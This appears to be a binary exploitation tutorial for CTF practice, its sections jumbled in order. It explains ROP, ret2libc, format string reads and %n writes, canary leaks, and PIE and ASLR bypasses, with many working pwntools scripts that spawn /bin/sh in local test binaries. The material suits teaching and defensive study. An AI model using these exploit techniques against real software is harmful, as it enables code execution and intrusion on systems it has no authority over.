It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack
Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:
Return-Oriented Programming
Bypassing NX
The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command, such as cat flag.txt, and then pass it as a parameter to system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by system gives the attacker a shell much like the shellcode we used did.
Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.
Exploiting Calling Conventions
Utilising Calling Conventions
32-bit
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
from pwn import *
context.binary = ELF('./vuln')
p = process()
payload = b'\x90' * 240 # The NOPs
payload += asm(shellcraft.sh()) # The shellcode
payload = payload.ljust(312, b'A') # Padding
payload += p32(0xffffcfb4 + 120) # Address of the buffer + half nop length
log.info(p.clean())
p.sendline(payload)
p.interactive()
nop = asm(shellcraft.nop())
Everything after the address of flag() will be part of the stack frame for the next function, as it is expected to be there - except instead of using push instructions, we wrote it there manually.
64-bit
Same logic, except we have to utilise the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).
We have to fill the registers before the function is called
A ret2libc is based off the system function found within the C library. This function executes anything passed to it, making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to system, it will pop a shell.
And that is the entire basis of it - passing /bin/sh as a parameter to system. Doesn't sound too bad, right?
To start with, we are going to disable ASLR. ASLR randomises the location of libc in memory, meaning we cannot (without other steps) work out the location of system and /bin/sh. To understand the general theory, we will start with it disabled.
Manual Exploitation
Getting Libc and its base
Fortunately, Linux has a command called ldd that lists a binary's dynamically linked libraries. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
We need libc.so.6, so the base address of libc is 0xf7dc2000.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
Getting the location of system()
To call system, we obviously need its location in memory. We can use the readelf command for this.
The -s flag tells readelf to list symbols, such as functions. Here we find that the offset of system from the libc base is 0x44f00.
Getting the location of /bin/sh
Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
-a tells it to scan the entire file; -t x tells it to output the offset in hex.
32-bit Exploit
64-bit Exploit
Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.
Automating with Pwntools
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
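For reference, a sketch of what the 64-bit version might look like using the ROP class - it reuses the libc base and padding from the manual approach, so treat it as an illustration rather than the canonical exploit:

from pwn import *

elf = context.binary = ELF('./vuln-64')
libc = elf.libc
libc.address = 0x7ffff7de5000           # base found with ldd, as before

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(elf)                          # gadgets come from the binary itself
rop.call(libc.sym['system'], [binsh])   # builds pop rdi; ret -> binsh -> system

p = process()
p.clean()
p.sendline(b'A' * 72 + rop.chain())
p.interactive()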
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> second param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
No eXecute
The defence against shellcode
As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralising shellcode.
To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.
The Windows version of NX is DEP, which stands for Data Execution Prevention
Checking for NX
You can either use pwntools' checksec or rabin2.
Calling Conventions
A more in-depth look into parameters for 32-bit and 64-bit programs
If we run the 32-bit and 64-bit versions, we get the same output:
Just what we expected.
Analysing 32-bit
Let's open the binary up in radare2 and disassemble it.
If we look closely at the calls to sym.vuln, we see a pattern:
We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.
The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.
Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:
Clearly that's our parameter.
So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like:
Analysing 64-bit
Let's disassemble main again here.
Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says edi instead). If we break on sym.vuln again we can check rdi with the command dr rdi.
Just dr will display all registers
Awesome.
Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address
Multiple Parameters
Source
32-bit
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.
So it becomes quite clear how more parameters are placed on the stack:
64-bit
So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).
Bigger 64-bit values
Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilise a bigger number:
If you disassemble main, you can see it disassembles to
movabs is used to encode a mov with a full 64-bit immediate value - treat it as if it's a regular mov.
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random, the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from it to get the base address, and from that the addresses of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Double-Checking
Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomised in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.
Pwntools, PIE and ROP
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
$ checksec vuln
[*] 'vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.
Example
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.
What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:
And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.
Utilising Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, rsp points at the next value on the stack - but wait. We can overwrite that next value too.
Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.
On the original ret, the one whose return pointer we overwrite, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.
rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.
RSP moves onto the next items on the stack, the address of flag(). The ret is executed and flag() is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:
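In pwntools terms, with a hypothetical padding and gadget address, that layout would be:

from pwn import *

POP_RDI = 0x401234           # hypothetical address of the pop rdi; ret gadget
padding = 64                 # hypothetical padding up to the saved return pointer

payload  = b'A' * padding
payload += p64(POP_RDI)      # the original ret pops this, jumping to the gadget
payload += p64(0x10)         # pop rdi takes this off the stack
payload += p64(0x16)         # the gadget's ret pops this into rip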
Note if you have multiple pop instructions, you can just add more values.
We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
Finding Gadgets
We can use the tool ROPgadget to find possible gadgets.
Combine it with grep to look for specific registers.
Format String Bug
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifiers" within strings. Let's look at an example:

int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
This prints out:
So, it replaced %d with the value, %f with the float value and %x with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try printing out the same value in hex 3 times:
As expected, we get
What happens, however, if we don't have enough arguments for all the format specifiers?
Erm... what happened here?
The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If not enough parameters were passed, it'll just grab the next values off the stack - essentially leaking stack values. And that's what makes it so dangerous.
How to abuse this
Surely if it's a bug in the code, the attacker can't do much, right? Well the real issue is when C code takes user-provided input and prints it out using printf.
If we run this normally, it works as expected:
But what happens if we input format string specifiers, such as %x?
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
Choosing Offsets
To print the same value 3 times, writing something like printf("%x %x %x", value, value, value) gets tedious - so, there is a better way in C: printf("%1$x %1$x %1$x", value).
The 1$ in between the % and the x tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p we can just do %6$p. This allows us to be much more efficient.
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value off the stack, you read the value at the memory address it points to.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address into the buffer and then point %s at it, we can get an arbitrary read!
%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which are always \x7fELF. Start with the basics:
Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:
It doesn't work.
The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
Let's break down the payload:
We add 4 | characters because we want the address we write to fill one whole memory address slot, not half of one and half of another, because that would result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p with an s.
Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.
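Putting all of that together, the final read might look something like this (a sketch - the binary name is an assumption, and the offsets are the ones worked out above):

from pwn import *

elf = context.binary = ELF('./vuln')   # hypothetical 32-bit, no-PIE binary
p = process()

payload = b'%8$s||||'                  # specifier first (printf stops at null bytes), padded to 8 bytes
payload += p32(elf.address)            # 0x8048000 - two stack slots after %6$p, hence %8$s

p.sendline(payload)
print(p.clean())                       # should contain b'\x7fELF\x01\x01\x01'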
Arbitrary Writes
Luckily, C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes to it the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to print that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that; I fully recommend watching a more detailed explanation to completely understand them, but let's jump into a basic binary.
Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.
Work out the location of auth
As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.
Location of auth is 0x0804c028.
Writing the Exploit
We're lucky there are no null bytes, so there's no need to change the order.
Buffer is the 7th %p.
And easy peasy:
Pwntools
As you can expect, pwntools has a handy feature for automating %n format string exploits:
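For the auth binary above, that could look something like this (a sketch using the offset and address we already found):

from pwn import *

AUTH = 0x804c028                          # location of auth, found with readelf earlier

p = process('./auth')

payload = fmtstr_payload(7, {AUTH: 10})   # write the value 10 to AUTH via %n
p.sendline(payload)
print(p.clean())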
The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
You can also grab the location of the auth symbol with pwntools:
Check out the pwntools tutorials for more cool features
Stack Canaries
The Buffer Overflow defence
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected*** error message.
On Linux, stack canaries end in 00. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
PIE Bypass with Given Leak
Exploiting PIE with a given leak
The Source
Pretty simple - we print the address of main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
Source
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().
32-bit
First let's check there is a canary:
Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of addresses, it's around 24 until that value, so we'll try one before and one after as well to make sure.
It appears to be at %23$p. Remember, stack canaries are randomised for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
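(A rough sketch - the exact prompt text will depend on your binary's output.)

```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

p.sendline('%23$p')                  # the canary was at offset 23 in our testing
p.recvuntil('you ')                  # hypothetical text echoed before our leak
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')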
Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).
Now we can check the canary and EIP offsets:
Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.
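Putting it together, a sketch of the final payload (the 32 bytes of padding up to the canary is hypothetical - use whatever your binary needs; the 12 bytes after the canary comes from the calculation above):

```python
payload  = b'A' * 32            # hypothetical padding up to the canary
payload += p32(canary)          # overwrite the canary with itself so the check passes
payload += b'B' * 12            # padding between the canary and the saved EIP
payload += p32(elf.sym['win'])  # overwrite the return pointer with win()

p.sendline(payload)
print(p.clean().decode('latin-1'))
```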
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.
Bruteforcing the Canary
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and loads of times with different canary guesses until you get a hit, which you can differentiate by the presence of a known plaintext such as flag{. This can take ages to run and is frankly not a particularly interesting challenge.
Let's just run the script to make sure it's the right one :D
Yup, and as we expected, it prints the location of main.
Exploitation
First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.
Now we want to take in the main function location. To do this we can simply receive up until it (and do nothing with that) and then read it.
Since we received the entire line except for the address, only the address will come up with p.recvline().
Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from binary base until the base address is set, after which it returns the absolute address in memory.
In this case, elf.sym['main'] will return 0x11b9; if we ran it again, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from the address we leaked to get the base of the binary.
Now we know the base we can just call win().
By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.
And does it work?
Awesome!
Final Exploit
Summary
From the leak address of main, we were able to calculate the base address of the binary. From this we could then calculate the address of win and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
A small issue you may get when pwning on 64-bit systems is that your exploit works perfectly locally but fails remotely - or even fails when you try to use the provided LIBC version rather than your local one. This arises due to something called stack alignment.
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Analysis
Everything's as we expect.
Exploitation
Setup
As last time, first we set everything up.
PIE Leak
Now we just need a leak. Let's try a few offsets.
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's leak the value and get the base address.
Now we just need to send the exploit payload.
Final Exploit
64-bit
Same deal, just 64-bit. Try it out :)
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as libc PIE, there is a key difference.
ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE is compiled into the binary itself, while the presence of ASLR depends entirely on the environment running the binary. If I compiled a binary on a machine with ASLR disabled and sent it to you, it wouldn't make any difference at all if you ran it with ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function addresses (e.g. the address of system for a ret2libc).
The Format String Trap
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT, as explained in the next section.
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.
PLT and GOT
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common in CTFs than statically linked ones. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality.
For example, an ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means users can continually upgrade their libraries, instead of having to redownload all their binaries every time a new version comes out.
ASLR Bypass with Given Leak
The Source
Just as we did for PIE, except this time we print the address of system.
Analysis
Virtual Addresses and Virtual Memory
If we disable ASLR and run two programs side-by-side, we might notice that the libc is loaded into the same address. Contrary to what you might think, these programs are not sharing the same instance of libc!
In fact, even with ASLR off, we can run two different programs and we might still notice that they are loaded into broadly the same part of memory.
The reason for this is that the addresses we see in a debugger are virtual addresses.
Overview
GOT Overwrite
Hijacking functions
You may remember that the GOT stores the actual locations in libc of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:
Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf with the location of system. The code would essentially look like the following:
Bit of an issue? Yes. Our input is being passed directly to system.
ret2plt ASLR bypass
Overview
This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.
RELRO
Relocation Read-Only
RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.
Partial RELRO
Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
When a program and its libraries are started up, they are loaded into a Virtual Address Space (VAS). Addresses in the VAS are then mapped to real, physical locations in RAM!
This means that if you have two separate programs both loaded at 0x5655523fa000, this address actually corresponds to two different locations in RAM. The OS handles the translation by using the processor's Memory Management Unit (MMU), and the actual memory location differs for each process.
In fact, as the OS is what handles the mapping from virtual addresses to physical addresses, the executable itself only ever sees virtual addresses! So when pointers are printed out and display virtual addresses, that is not the program hiding a layer of abstraction from you - it genuinely treats pointers that way. The abstraction is another layer deep.
The Kernel
The kernel only has one contiguous virtual address space, so all processes running in kernel mode can see one another (and all user mode programs as well!). In fact, the reason programs are loaded at lower addresses is that in Linux the higher addresses are reserved for the kernel. This is why, later on, you will see drivers loaded at addresses starting with 0xffff...
Benefits
Virtual addressing has three main benefits.
Contiguous Memory Allocation
While physical RAM may not have a sufficient chunk of contiguous memory for a program, virtual addressing allows us to pretend as if it does, loading large programs into what seems to be one large chunk. The corresponding physical addresses, of course, could really be spread out all over memory. Virtual addresses mean we do not have to worry about such problems.
Strict Process Isolation
Processes cannot interfere with the address space of another process, creating a stronger security sandbox.
Allocate More Memory than we have RAM
When the physical memory (RAM) is filled up, the OS will move inactive pages in memory to the swap space, which is located on the hard drive. The idea is that, in times of large memory usage, the hard drive acts as a sort of "RAM overflow". Swapped memory is much, much slower than RAM, which is why inactive memory pages are the ones moved. This allows the Operating System to handle low memory gracefully and without crashing. Virtual addressing allows developers to not think about this happening, as the address translation done by the OS via the MMU will automatically map the corresponding virtual addresses to hard drive addresses.
Full RELRO
Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries because it can make them take much longer to load, as all the function addresses need to be resolved at once.
The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.
Using ESP
If you think about it, once the return pointer is popped off the stack, ESP will point at whatever comes after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp gadget? Once the return pointer gets popped off, ESP will point at the shellcode, and thanks to the jmp esp it will be executed!
ret2reg
ret2reg extends the idea behind jmp esp to any register that happens to point somewhere you need it to.
ret = elf.address + 0x2439
[...]
rop.raw(POP_RDI)
rop.raw(0x4) # first parameter
rop.raw(ret) # align the stack
rop.raw(system)
Your address of system might end in different characters - you just have a different libc version
Exploitation
Much of this is as we did with PIE.
Note that we include the libc here - this is just another ELF object that makes our lives easier.
Parse the address of system and calculate libc base from that (as we did with PIE):
Now we can finally ret2libc, using the libcELF object to really simplify it for us:
Final Exploit
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy:
Instead, you could do:
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
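As a rough sketch of the pwntools version (assuming libc is an ELF object with libc.address already set, and hypothetical padding of 32 bytes):

```python
rop = ROP(libc)                                  # build the chain against libc's symbols
binsh = next(libc.search(b'/bin/sh\x00'))
rop.call('system', [binsh])                      # packs the address, a fake return and the argument

payload = b'A' * 32                              # hypothetical padding to the return pointer
payload += rop.chain()
p.sendline(payload)
p.interactive()
```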
We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.
Exploitation
All the basic setup
Now we want to send a payload that leaks the real address of puts. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out its actual location. This works because string arguments in C are really pointers to where the string can be found, so pointing the parameter at the GOT entry (which we know the location of) will print out its contents.
But why is there a main there? Well, if we set the return address to random jargon, we'll leak libc base but then the binary will crash; if we return to main instead, we essentially restart the binary - except we now know libc base, so this time around we can do a ret2libc.
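A sketch of that first payload (the padding value is hypothetical - work it out as usual):

```python
padding = 32                   # hypothetical offset to the saved return pointer

payload = flat(
    b'A' * padding,
    elf.plt['puts'],           # return to puts@plt...
    elf.sym['main'],           # ...then back to main so we can send a second payload
    elf.got['puts']            # ...with puts' GOT entry as the argument (32-bit convention)
)
p.sendline(payload)
```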
Remember that the GOT entry won't be the only thing printed - puts, like most functions in C, prints until a null byte. This means it will keep printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32() to interpret them as a little-endian number. After that we ignore the rest of the leaked values, as well as the Come get me prompt from calling main again.
From here, we simply calculate libc base again and perform a basic ret2libc:
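(Continuing the sketch above, assuming a libc ELF object and the same hypothetical padding.)

```python
puts_leak = u32(p.recv(4))                   # first 4 bytes of output are puts' GOT entry
                                             # (you may need to recvuntil any prompt text first)
libc.address = puts_leak - libc.sym['puts']  # real address minus offset = libc base

payload = flat(
    b'A' * padding,
    libc.sym['system'],
    0x0,                                     # fake return address for system()
    next(libc.search(b'/bin/sh\x00'))
)
p.sendline(payload)
p.interactive()
```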
And bingo, we have a shell!
Final Exploit
64-bit
You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
